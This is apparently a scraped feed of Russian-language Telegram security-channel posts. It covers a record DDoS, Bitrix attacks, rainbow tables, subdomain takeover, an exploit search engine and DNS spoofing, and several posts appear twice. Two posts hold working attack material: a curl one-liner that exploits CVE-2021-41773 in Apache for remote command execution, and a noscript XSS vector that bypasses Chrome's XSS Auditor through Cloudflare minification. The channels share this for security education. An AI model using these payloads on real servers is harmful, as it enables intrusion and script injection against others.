Forwarded from Hacker News
Cloudflare отразила рекордную DDoS-атаку мощностью 26 млн запросов в секунду
https://xakep.ru/2022/06/14/26-mln-rps/
https://xakep.ru/2022/06/14/26-mln-rps/
XAKEP
Cloudflare отразила рекордную DDoS-атаку мощностью 26 млн запросов в секунду
Компания Cloudflare сообщила о новой рекордной DDoS-атаке, с которой специалистам удалось справиться на прошлой неделе. В атаке участвовал небольшой, но мощный ботнет, состоящий из 5067 устройств.
Forwarded from Кавычка (crlf)
attacking_bitrix.pdf
3.6 MB
Уязвимости и атаки на CMS Bitrix
1. Особенности
2. Уязвимости
3. Методы атак
Приятного чтения!
1. Особенности
2. Уязвимости
3. Методы атак
Приятного чтения!
Недавняя CVE-2021-41773 в Apache 2.4.49, это не только выход из директории с чтением файлов, как многие подумали
curl --data "A=|echo;id" 'http://127.0.0.1:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh'
curl --data "A=|echo;id" 'http://127.0.0.1:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh'
Forwarded from Life-Hack - Хакер
Telegraph
Радужная таблица
#Обучение Радужная таблица (англ. rainbow table) — специальный вариант таблиц поиска (англ. lookup table) для обращения криптографических хеш-функций, использующий механизм разумного компромисса между временем поиска по таблице и занимаемой памятью (англ.…
Хороший материал по захвату доменов (поддоменов), когда о них забывают:
https://github.com/EdOverflow/can-i-take-over-xyz
https://github.com/EdOverflow/can-i-take-over-xyz
GitHub
GitHub - EdOverflow/can-i-take-over-xyz: "Can I take over XYZ?" — a list of services and how to claim (sub)domains with dangling…
"Can I take over XYZ?" — a list of services and how to claim (sub)domains with dangling DNS records. - EdOverflow/can-i-take-over-xyz
Быстрый поиск по эксплойтам и полезным программам. Enjoy!
https://sploitus.com
https://sploitus.com
Sploitus
💀 Sploitus | Exploits & Tools Search Engine
Sploitus is a convenient central place for identifying the newest exploits and finding attacks that exploit known vulnerabilities. The search engine is also a good resource for finding security and vulnerability discovery tools.
Не все йогурты одинаково полезны!
Например, настройка в CloudFlare по сжатию страницы ломает Chrome XSS Auditor, что позволяет с легкостью его обойти. Достаточно указать вектор, в котором содержимое атрибутов не будет обрамлено кавычками, Auto Minify CloudFlare все сделает за тебя, а Chrome не увидит, что вектор атаки передался в URL, так как содержимое на странице будет различаться от того, что было передано в запросе.
<noscript/src=//html5sec.org/test.js></noscript>
вжух =>
<noscript src="//html5sec.org/test.js"></noscript>
https://twitter.com/i_bo0om/status/895896778914004993
Например, настройка в CloudFlare по сжатию страницы ломает Chrome XSS Auditor, что позволяет с легкостью его обойти. Достаточно указать вектор, в котором содержимое атрибутов не будет обрамлено кавычками, Auto Minify CloudFlare все сделает за тебя, а Chrome не увидит, что вектор атаки передался в URL, так как содержимое на странице будет различаться от того, что было передано в запросе.
<noscript/src=//html5sec.org/test.js></noscript>
вжух =>
<noscript src="//html5sec.org/test.js"></noscript>
https://twitter.com/i_bo0om/status/895896778914004993
Forwarded from Этичный Хакер
👾DNS атака: как это работает
В этой статье рассмотрим что такое и какие типы атак имеются на DNS.
➖ https://telegra.ph/DNS-spoofing-kak-ehto-rabotaet-06-09
#less | 💀 Этичный хакер
В этой статье рассмотрим что такое и какие типы атак имеются на DNS.
➖ https://telegra.ph/DNS-spoofing-kak-ehto-rabotaet-06-09
#less | 💀 Этичный хакер